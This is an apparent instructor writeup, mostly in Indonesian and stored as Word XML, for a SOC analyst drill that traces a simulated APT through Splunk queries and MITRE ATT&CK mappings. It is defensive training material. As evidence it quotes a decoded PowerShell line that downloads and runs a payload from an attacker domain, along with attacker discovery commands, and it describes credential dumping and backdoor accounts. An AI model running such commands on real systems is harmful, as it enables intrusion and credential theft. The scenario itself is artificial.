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9E75"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>SOC Cyber Drill</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="475569"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Intended Solution Writeup</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PT Nusantara Digital — APT Attack Investigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>JagoanSiber · SOC Analyst Training</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>April 2026 | CONFIDENTIAL — Instructor Only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Scenario Background</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>PT Nusantara Digital adalah perusahaan teknologi di Jakarta yang baru saja meng-hire SOC team. Pada minggu pertama operasional SOC, SIEM (Splunk) mendeteksi beberapa anomali yang perlu diinvestigasi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Sebagai SOC analyst, kamu diminta untuk menginvestigasi log selama 3 hari (7-9 April 2026) dan menentukan: apakah ada serangan? Jika ya, bagaimana kronologinya, apa dampaknya, dan apa yang harus dilakukan?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Spoiler: Ini adalah serangan APT (Advanced Persistent Threat) dengan full kill chain — dari reconnaissance sampai data exfiltration. Writeup ini menjelaskan langkah-langkah investigasi secara detail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Network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Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>OS / Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>FW-EDGE-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>203.0.113.1 / 10.10.0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Palo Alto — Edge Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>WEB-SERVER-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>10.10.1.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Ubuntu 22.04 — Apache Web Server (DMZ)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>WS-FINANCE-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>10.10.2.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Windows 11 — Finance Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>WS-HR-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>10.10.2.51</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Windows 11 — HR Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DC-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>10.10.3.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Windows Server 2022 — Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DB-SERVER-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>10.10.3.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Ubuntu 22.04 — MySQL Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Attacker Infrastructure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IP / Domain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GeoIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>91.215.85.142</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Scanner / Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Romania</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>185.234.216.88 / dl.techsupport-cdn.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Payload Staging + Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>45.77.65.211 / update-service.cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Command &amp; Control (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Netherlands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Investigation — Step by Step</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Investigasi disusun mengikuti alur kronologis serangan. Setiap step mencakup: konteks → SPL query → temuan → penjelasan → MITRE ATT&amp;CK mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 1: Reconnaissance (Day 1, ~09:15)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Investigasi dimulai dari Suricata IDS alerts. Di SOC, IDS alerts biasanya jadi starting point karena ini deteksi paling awal terhadap aktivitas mencurigakan.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 Port Scan Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Langkah pertama: cari alert bertipe scan di Suricata. Ini akan menunjukkan apakah ada reconnaissance activity terhadap infrastruktur kita.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index=ids "ET SCAN" | stats count by src_ip alert.signature dest_port</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>IP 91.215.85.142 melakukan port scan terhadap WEB-SERVER-01. 18 port di-scan termasuk SSH (22), HTTP (80), HTTPS (443), SMB (445), MySQL (3306), RDP (3389). Semua DENIED oleh firewall.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Corroborate dengan firewall log untuk memastikan scan memang diblok:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Corroborate — Firewall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=firewall 91.215.85.142 | stats count by action dest_port | sort dest_port</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 Web Vulnerability Scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Scanner yang sama juga mencoba web vulnerability scanning terhadap Apache web server.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index=ids src_ip=91.215.85.142 event_type=alert NOT "ET SCAN" | stats count by alert.signature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>SQL Injection attempts (UNION SELECT, SELECT FROM), XSS, dan Directory Traversal terdeteksi. Apache access log menunjukkan semua request mendapat 404/400 — scanner GAGAL menemukan vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Corroborate — Apache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=web 91.215.85.142 | stats count by status uri_path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:t>T1595 — Active Scanning, T1190 — Exploit Public-Facing Application (attempted)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>💡 Insight untuk peserta: Scanner gagal, tapi ini bukan akhir cerita. Attacker yang skilled akan beralih ke vektor lain. Perhatikan bahwa recon terjadi JAM 9 PAGI — dan serangan berikutnya terjadi jam 2 siang hari yang sama. Ada jeda 5 jam — kemungkinan attacker menyiapkan phishing campaign.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 2: Initial Access — Phishing (Day 1, 14:47)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Setelah web scanning gagal, attacker mengirim phishing email ke user di finance department. Email-nya tidak ada di log (karena kita tidak punya email gateway logs), tapi EFEK dari phishing terlihat jelas di Sysmon.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Malicious Document Execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Cari proses yang di-spawn oleh Microsoft Word — ini pattern klasik malicious macro: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EventID=1 ParentImage="*WINWORD*"</w:t>
        <w:br/>
        <w:t>| table _time Computer Image CommandLine User ParentImage ParentCommandLine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>User ratna.finance di WS-FINANCE-01 membuka file "Invoice_Q1_2026.docm". Macro di dalam dokumen menjalankan: WINWORD.EXE → cmd.exe → powershell.exe -enc [Base64]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ini adalah attack chain klasik: user buka dokumen → macro jalan otomatis → spawn cmd → jalankan PowerShell. Proses chain WINWORD → cmd → powershell TIDAK PERNAH terjadi di operasi normal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 PowerShell Downloader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EventID=1 Image="*powershell*" CommandLine="*enc*"</w:t>
        <w:br/>
        <w:t>| table _time CommandLine User</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Base64 decode dari parameter -enc menunjukkan:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Decoded Base64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IEX (New-Object Net.WebClient).DownloadString('https://dl.techsupport-cdn.net/update.exe')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>PowerShell mendownload malicious payload dari domain attacker (dl.techsupport-cdn.net → 185.234.216.88).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Payload Dropped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EventID=11 TargetFilename="*svchost_update*"</w:t>
        <w:br/>
        <w:t>| table _time Computer TargetFilename Hashes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>File malicious di-drop ke: C:\Users\ratna.finance\AppData\Local\Temp\svchost_update.exe. Nama file dibuat mirip svchost.exe (Windows system process) untuk menghindari deteksi visual.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:t>T1566.001 (Phishing Attachment), T1059.001 (PowerShell), T1204.002 (User Execution), T1027 (Obfuscated Files)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 3: Command &amp; Control (Day 1, 14:49 — ongoing)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Setelah payload dieksekusi, malware membuat koneksi ke C2 server. Ini adalah "jembatan" yang memungkinkan attacker mengontrol mesin korban secara remote.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 C2 Connection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EventID=3 Image="*svchost_update*"</w:t>
        <w:br/>
        <w:t>| table _time DestinationIp DestinationPort Image</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>svchost_update.exe membuat koneksi ke 45.77.65.211:443 (HTTPS). C2 menggunakan HTTPS supaya traffic blend in dengan web browsing normal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 DNS Resolution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index=dns ("update-service.cloud" OR "techsupport-cdn")</w:t>
        <w:br/>
        <w:t>| table _time src_ip domain answer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>Dua domain suspicious: update-service.cloud (C2) dan dl.techsupport-cdn.net (staging). Keduanya di-resolve dari WS-FINANCE-01.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Beacon Pattern Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ini salah satu teknik hunting yang paling powerful — cari pola reguler di koneksi keluar:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Splunk Query — Timechart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=firewall dest_ip=45.77.65.211 | timechart count span=5m</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Count Total</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=firewall 45.77.65.211 | stats count</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>~3,071 koneksi selama 3 hari. Interval: setiap ~60 detik. Ini adalah BEACON PATTERN — signature khas C2 communication. Traffic normal tidak pernah seteratur ini.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:t>T1071.001 (Web Protocols C2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 4: Discovery &amp; Credential Access (Day 2, 09:10-09:15)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Hari kedua, attacker mulai menjelajahi environment melalui C2 channel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Discovery Commands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EventID=1 Computer="WS-FINANCE-01*"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  (Image="*whoami*" OR Image="*ipconfig*" OR Image="*net.exe*" OR Image="*nltest*" OR Image="*systeminfo*")</w:t>
        <w:br/>
        <w:t>| table _time Image CommandLine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>5 discovery commands dijalankan dalam 1 menit: whoami /all, ipconfig /all, net group "Domain Admins" /domain, nltest /domain_trusts, systeminfo. Attacker sedang mapping environment — siapa usernya, ada di domain mana, siapa admin-nya.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Credential Dumping (Mimikatz)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index=sysmon EventID=10 TargetImage="*lsass*"</w:t>
        <w:br/>
        <w:t>| table _time Computer SourceImage TargetImage GrantedAccess</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>PowerShell mengakses LSASS process (GrantedAccess: 0x1010). Ini adalah signature Mimikatz — tool paling populer untuk mencuri credentials dari memory Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:t>T1082 (System Info Discovery), T1069.002 (Domain Groups), T1003.001 (LSASS Memory)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 5: Lateral Movement (Day 2, 09:20-09:25)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Dengan credentials yang dicuri, attacker bergerak ke sistem lain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Pass-the-Hash ke Domain Controller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index=windows EventCode=4624 LogonType=3 10.10.2.50 host="DC-01*"</w:t>
        <w:br/>
        <w:t>| table _time src_ip Account_Name LogonType</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>Network logon (type 3) dari WS-FINANCE-01 ke DC-01 menggunakan NTLM authentication. Di domain environment modern, NTLM seharusnya jarang dipakai (harusnya Kerberos). NTLM dari workstation ke DC = strong indicator Pass-the-Hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Privilege Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=windows EventCode=4672 host="DC-01*" ratna.finance</w:t>
        <w:br/>
        <w:t>| table _time Account_Name Privileges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>EventCode 4672 confirm: ratna.finance mendapat ADMIN privileges di DC-01 — SeDebugPrivilege, SeBackupPrivilege, dll.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 SSH ke Database Server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index=linux sourcetype=syslog "Accepted" 10.10.2.50</w:t>
        <w:br/>
        <w:t>| table _time host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>SSH login dari 10.10.2.50 (WS-FINANCE-01) ke DB-SERVER-01 sebagai root menggunakan password. Windows workstation → SSH ke Linux DB server = sangat anomalous. Finance user tidak seharusnya SSH ke database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t xml:space="preserve">🎯 MITRE ATT&amp;CK: </w:t>
      </w:r>
      <w:r>
        <w:t>T1550.002 (Pass the Hash), T1021.004 (Remote Services: SSH)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 6: Persistence (Day 2, 09:22-09:30)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Attacker membuat "pintu belakang" supaya tetap punya akses meskipun malware dihapus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 Backdoor Account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 User Created (4720)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=windows EventCode=4720</w:t>
        <w:br/>
        <w:t>| table _time host Account_Name Target_Account_Name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Added to Domain Admins (4728)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=windows EventCode=4728 Group_Name="Domain Admins"</w:t>
        <w:br/>
        <w:t>| table _time host Member_Name Group_Name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Finding: </w:t>
      </w:r>
      <w:r>
        <w:t>Account "svc_backup" dibuat di DC-01 oleh ratna.finance, lalu ditambahkan ke Domain Admins. Nama "svc_backup" dipilih supaya terlihat seperti service account yang legitimate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>📋 Schtasks Command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1D9E75"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>index=sysmon EventID=1 Image="*schtasks*"</w:t>
        <w:br/>
        <w:t>| table _time Computer CommandLine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
